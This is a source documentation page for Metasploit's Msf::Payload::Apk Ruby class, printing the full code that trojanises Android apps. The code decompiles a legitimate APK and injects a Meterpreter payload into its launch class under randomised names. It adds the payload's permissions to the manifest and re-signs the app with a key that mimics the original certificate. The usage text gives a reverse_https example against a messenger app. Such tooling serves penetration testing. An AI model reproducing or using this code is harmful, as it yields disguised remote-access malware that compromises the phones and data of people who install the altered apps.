Class: Msf::Payload::Apk

Inherits:
Object
  • Object
show all
Defined in:
lib/msf/core/payload/apk.rb

Instance Method Summary collapse

Instance Method Details

#backdoor_apk(apkfile, raw_payload, signature = true, manifest = true, apk_data = nil, service = true) ⇒ Object



220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
# File 'lib/msf/core/payload/apk.rb', line 220

def backdoor_apk(apkfile, raw_payload, signature = true, manifest = true, apk_data = nil, service = true)
  unless apk_data || apkfile && File.readable?(apkfile)
    usage
    raise RuntimeError, "Invalid template: #{apkfile}"
  end

  check_apktool = run_cmd(%w[apktool -version])
  if check_apktool.nil?
    raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."
  end

  if check_apktool.to_s.include?('java: not found')
    raise RuntimeError, "java not found. If it's not in your PATH, please add it."
  end

  jar_name = 'apktool.jar'
  if check_apktool.to_s.include?("can't find #{jar_name}")
    raise RuntimeError, "#{jar_name} not found. This file must exist in the same directory as apktool."
  end

  check_apktool_output_for_exceptions(check_apktool)

  apktool_version = Rex::Version.new(check_apktool.split("\n").first.strip)
  min_required_apktool_version = Rex::Version.new('2.9.2')
  unless apktool_version >= min_required_apktool_version
    # technically MSF supports 2.7.0+ but versions < 2.9.2 are vulnerable to CVE-2024-21633
    # see: https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w
    raise RuntimeError, "apktool version #{apktool_version} not supported, please download at least version #{min_required_apktool_version}."
  end

  #Create temporary directory where work will be done
  tempdir = Dir.mktmpdir
  File.binwrite("#{tempdir}/payload.apk", raw_payload)
  if apkfile
    FileUtils.cp apkfile, "#{tempdir}/original.apk"
  else
    File.binwrite("#{tempdir}/original.apk", apk_data)
  end

  if signature
    keytool = run_cmd(['keytool'])
    unless keytool != nil
      raise RuntimeError, "keytool not found. If it's not in your PATH, please add it."
    end

    apksigner = run_cmd(['apksigner'])
    if apksigner.nil?
      raise RuntimeError, "apksigner not found. If it's not in your PATH, please add it."
    end

    zipalign = run_cmd(['zipalign'])
    unless zipalign != nil
      raise RuntimeError, "zipalign not found. If it's not in your PATH, please add it."
    end

    keystore = "#{tempdir}/signing.keystore"
    storepass = "android"
    keypass = "android"
    keyalias = "signing.key"

    orig_cert_data = extract_cert_data_from_apk_file(apkfile)
    orig_cert_dname = orig_cert_data[0]
    orig_cert_startdate = orig_cert_data[1]
    orig_cert_validity = orig_cert_data[2]

    print_status "Creating signing key and keystore..\n"
    keytool_output = run_cmd([
      'keytool', '-genkey', '-v', '-keystore', keystore, '-alias', keyalias, '-storepass', storepass,
      '-keypass', keypass, '-keyalg', 'RSA', '-keysize', '2048', '-startdate', orig_cert_startdate,
      '-validity', orig_cert_validity, '-dname', orig_cert_dname
    ])

    if keytool_output.include?('keytool error: ')
      raise RuntimeError, "keytool could not generate key: #{keytool_output}"
    end
  end

  print_status "Decompiling original APK..\n"
  apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '--only-main-classes', '-o', "#{tempdir}/original"])
  check_apktool_output_for_exceptions(apktool_output)

  print_status "Decompiling payload APK..\n"
  apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/payload.apk", '-o', "#{tempdir}/payload"])
  check_apktool_output_for_exceptions(apktool_output)

  amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")

  print_status "Locating hook point..\n"
  hookable_class = find_hook_point(amanifest)
  if hookable_class.blank?
    raise 'Unable to find hookable class in AndroidManifest.xml'
  end

  hookable_class_filename = hookable_class.to_s.gsub('.', '/') + '.smali'
  hookable_class_filepath = "#{tempdir}/original/smali*/#{hookable_class_filename}"
  smalifile = Dir.glob(hookable_class_filepath).select { |f| File.readable?(f) && !File.symlink?(f) }.flatten.first
  if smalifile.blank?
    raise "Unable to find class file: #{hookable_class_filepath}"
  end

  hooksmali = File.binread(smalifile)
  entrypoint = 'return-void'
  unless hooksmali.include?(entrypoint)
    raise "Unable to find hookable function in #{smalifile}"
  end

  # Remove unused files
  FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
  FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")

  package = amanifest.xpath("//manifest").first['package']
  package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
  classes = {}
  classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
  classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
  classes['MainBroadcastReceiver'] = Rex::Text::rand_text_alpha_lower(5).capitalize
  package_slash = package.gsub(/\./, "/")

  print_status "Adding payload as package #{package}\n"
  payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
  payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
  FileUtils.mkdir_p payload_dir

  # Copy over the payload files, fixing up the smali code
  payload_files.each do |file_name|
    smali = File.binread(file_name)
    smali_class = File.basename file_name
    for oldclass, newclass in classes
      if smali_class == "#{oldclass}.smali"
        smali_class = "#{newclass}.smali"
      end
      smali.gsub!(/com\/metasploit\/stage\/#{oldclass}/, package_slash + "/" + newclass)
    end
    smali.gsub!(/com\/metasploit\/stage/, package_slash)
    newfilename = "#{payload_dir}#{smali_class}"
    File.open(newfilename, "wb") {|file| file.puts smali }
  end

  if service
    hookfunction = "L#{package_slash}/#{classes['MainService']};->start()V"
  else
    hookfunction = "L#{package_slash}/#{classes['Payload']};->startContext()V"
  end

  payloadhook = %Q^invoke-static {}, #{hookfunction}
  ^ + entrypoint
  hookedsmali = hooksmali.sub(entrypoint, payloadhook)

  print_status "Loading #{smalifile} and injecting payload..\n"
  File.open(smalifile, "wb") {|file| file.puts hookedsmali }

  injected_apk = "#{tempdir}/output.apk"
  aligned_apk = "#{tempdir}/aligned.apk"
  if manifest
    print_status "Poisoning the manifest with meterpreter permissions..\n"
    fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver'])
  end

  print_status "Rebuilding apk with meterpreter injection as #{injected_apk}\n"
  apktool_output = run_cmd(['apktool', 'b', '-o', injected_apk, "#{tempdir}/original"])
  check_apktool_output_for_exceptions(apktool_output)

  unless File.readable?(injected_apk)
    print_error apktool_output
    print_status("Unable to rebuild apk. Trying rebuild with AAPT2..\n")
    apktool_output = run_cmd(['apktool', 'b', '--use-aapt2', '-o', injected_apk, "#{tempdir}/original"])

    unless File.readable?(injected_apk)
      print_error apktool_output
      raise RuntimeError, "Unable to rebuild apk with apktool"
    end
  end

  if signature
    print_status "Aligning #{injected_apk}\n"
    zipalign_output = run_cmd(['zipalign', '-p', '4', injected_apk, aligned_apk])

    unless File.readable?(aligned_apk)
      print_error(zipalign_output)
      raise RuntimeError, 'Unable to align apk with zipalign.'
    end

    print_status "Signing #{aligned_apk} with apksigner\n"
    apksigner_output = run_cmd([
      'apksigner', 'sign', '--ks', keystore, '--ks-pass', "pass:#{storepass}", aligned_apk
    ])
    if apksigner_output.to_s.include?('Failed')
      print_error(apksigner_output)
      raise RuntimeError, 'Signing with apksigner failed.'
    end

    apksigner_verify = run_cmd(['apksigner', 'verify', '--verbose', aligned_apk])
    if apksigner_verify.to_s.include?('DOES NOT VERIFY')
      print_error(apksigner_verify)
      raise RuntimeError, 'Signature verification failed.'
    end
  else
    aligned_apk = injected_apk
  end

  outputapk = File.binread(aligned_apk)

  FileUtils.remove_entry tempdir
  outputapk
end

#check_apktool_output_for_exceptions(apktool_output) ⇒ Object



213
214
215
216
217
218
# File 'lib/msf/core/payload/apk.rb', line 213

def check_apktool_output_for_exceptions(apktool_output)
  if apktool_output.to_s.include?('Exception in thread')
    print_error(apktool_output)
    raise RuntimeError, "apktool execution failed"
  end
end

#extract_cert_data_from_apk_file(path) ⇒ Object



149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
# File 'lib/msf/core/payload/apk.rb', line 149

def extract_cert_data_from_apk_file(path)
  orig_cert_data = []

  # extract signing scheme v1 (JAR signing) certificate
  # v1 signing is optional to support older versions of Android (pre Android 11)
  # https://source.android.com/security/apksigning/
  keytool_output = run_cmd(['keytool', '-J-Duser.language=en', '-printcert', '-jarfile', path])

  if keytool_output.include?('keytool error: ')
    raise RuntimeError, "keytool could not parse APK file: #{keytool_output}"
  end

  if keytool_output.start_with?('Not a signed jar file')
    # apk file does not have a valid v1 signing certificate
    # extract signing certificate from newer signing schemes (v2/v3/v4/...) using apksigner instead
    apksigner_output = run_cmd(['apksigner', 'verify', '--print-certs', path])

    cert_dname = apksigner_output.scan(/^Signer #\d+ certificate DN: (.+)$/).flatten.first.to_s.strip
    if cert_dname.blank?
      raise RuntimeError, "Could not extract signing certificate owner: #{apksigner_output}"
    end
    orig_cert_data.push(cert_dname)

    # Create random start date from some time in the past 3 years
    from_date = DateTime.now.next_day(-rand(3 * 365))
    orig_cert_data.push(from_date.strftime('%Y/%m/%d %T'))

    # Valid for 25 years
    # https://developer.android.com/studio/publish/app-signing
    to_date = from_date.next_year(25)
    validity = (to_date - from_date).to_i
    orig_cert_data.push(validity.to_s)
  else
    if keytool_output.include?('keytool error: ')
      raise RuntimeError, "keytool could not parse APK file: #{keytool_output}"
    end

    cert_dname = keytool_output.scan(/^Owner:(.+)$/).flatten.first.to_s.strip
    if cert_dname.blank?
      raise RuntimeError, "Could not extract signing certificate owner: #{keytool_output}"
    end
    orig_cert_data.push(cert_dname)

    valid_from_line = keytool_output.scan(/^Valid from:.+/).flatten.first
    if valid_from_line.empty?
      raise RuntimeError, "Could not extract certificate date: #{keytool_output}"
    end

    from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip
    to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip
    from_date = DateTime.parse(from_date_str.to_s)
    orig_cert_data.push(from_date.strftime('%Y/%m/%d %T'))
    to_date = DateTime.parse(to_date_str.to_s)
    validity = (to_date - from_date).to_i
    orig_cert_data.push(validity.to_s)
  end

  if orig_cert_data.empty?
    raise RuntimeError, 'Could not extract signing certificate from APK file'
  end

  orig_cert_data
end

#find_hook_point(manifest) ⇒ String

Find a suitable smali point to hook. Returns the first suitable hook point.

Parameters:

  • manifest (String)

    AndroidManifest.xml file contents

Returns:

  • (String)

    Full class name, for example: com.example.app.MainActivity



43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# File 'lib/msf/core/payload/apk.rb', line 43

def find_hook_point(manifest)
  return unless manifest

  package = manifest.xpath('//manifest').first['package']

  application = manifest.xpath('//application')
  application_name = application.attribute('name').to_s
  unless (application_name.blank? || application_name == 'android.app.Application')
    unless application_name.include?('.')
      application_name = '.' + application_name
    end
    if application_name.start_with?('.')
      application_name = package + application_name
    end
    return application_name
  end

  activities = manifest.xpath('//activity|//activity-alias')
  for activity in activities
    activity_name = activity.attribute('targetActivity').to_s
    if activity_name.blank?
      activity_name = activity.attribute('name').to_s
    end

    next if activity_name.blank?

    category = activity.search('category')
    next unless category

    for cat in category
      category_name = cat.attribute('name').to_s
      next unless (category_name == 'android.intent.category.LAUNCHER' || category_name == 'android.intent.action.MAIN')

      unless activity_name.include?('.')
        activity_name = '.' + activity_name
      end
      if activity_name.start_with?('.')
        activity_name = package + activity_name
      end

      return activity_name
    end
  end

  nil
end

#fix_manifest(tempdir, package, main_service, main_broadcast_receiver) ⇒ Object



102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# File 'lib/msf/core/payload/apk.rb', line 102

def fix_manifest(tempdir, package, main_service, main_broadcast_receiver)
  #Load payload's manifest
  payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
  payload_permissions = payload_manifest.xpath("//manifest/uses-permission")

  #Load original apk's manifest
  original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
  original_permissions = original_manifest.xpath("//manifest/uses-permission")

  old_permissions = []
  add_permissions = []

  original_permissions.each do |permission|
    name = permission.attribute("name").to_s
    old_permissions << name
  end

  application = original_manifest.xpath('//manifest/application')
  payload_permissions.each do |permission|
    name = permission.attribute("name").to_s
    unless old_permissions.include?(name)
      add_permissions += [permission.to_xml]
    end
  end
  add_permissions.shuffle!
  for permission_xml in add_permissions
    print_status("Adding #{permission_xml}")
    if original_permissions.empty?
      application.before(permission_xml)
      original_permissions = original_manifest.xpath("//manifest/uses-permission")
    else
      original_permissions.before(permission_xml)
    end
  end

  application = original_manifest.at_xpath('/manifest/application')
  receiver = payload_manifest.at_xpath('/manifest/application/receiver')
  service = payload_manifest.at_xpath('/manifest/application/service')
  receiver.attributes["name"].value = package + '.' + main_broadcast_receiver
  receiver.attributes["label"].value = main_broadcast_receiver
  service.attributes["name"].value = package + '.' + main_service
  application << receiver.to_xml
  application << service.to_xml

  File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
end

#parse_manifest(manifest_file) ⇒ Nokogiri::XML

Read AndroidManifest.xml file.

Parameters:

  • manifest_file (String)

    Path to AndroidManifest.xml file

Returns:

  • (Nokogiri::XML)

    AndroidManifest.xml file contents



95
96
97
98
99
100
# File 'lib/msf/core/payload/apk.rb', line 95

def parse_manifest(manifest_file)
  File.open(manifest_file, "rb"){|file|
    data = File.read(file)
    return Nokogiri::XML(data)
  }
end


17
18
19
# File 'lib/msf/core/payload/apk.rb', line 17

def print_error(msg='')
  $stderr.puts "[-] #{msg}"
end


13
14
15
# File 'lib/msf/core/payload/apk.rb', line 13

def print_status(msg='')
  $stderr.puts "[*] #{msg}"
end

#run_cmd(cmd) ⇒ Object



28
29
30
31
32
33
34
35
# File 'lib/msf/core/payload/apk.rb', line 28

def run_cmd(cmd)
  begin
    stdin, stdout, stderr = Open3.popen3(*cmd)
    return stdout.read + stderr.read
  rescue Errno::ENOENT
    return nil
  end
end

#usageObject



23
24
25
26
# File 'lib/msf/core/payload/apk.rb', line 23

def usage
  print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n"
  print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
end